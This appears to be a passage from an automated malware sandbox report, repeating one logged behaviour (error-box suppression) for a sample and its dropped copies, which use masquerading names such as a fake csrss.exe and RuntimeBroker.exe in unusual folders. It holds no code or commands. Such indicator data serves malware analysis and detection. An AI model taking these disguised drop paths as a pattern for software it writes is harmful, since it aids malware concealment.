                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
